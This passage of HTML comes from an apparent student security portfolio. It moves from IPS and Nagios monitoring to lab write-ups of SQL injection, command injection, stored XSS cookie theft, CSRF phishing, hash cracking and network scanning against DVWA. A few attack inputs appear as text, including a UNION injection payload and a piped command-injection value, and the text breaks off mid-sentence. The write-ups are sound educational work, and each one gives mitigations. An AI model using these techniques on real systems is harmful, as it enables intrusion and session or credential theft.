          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
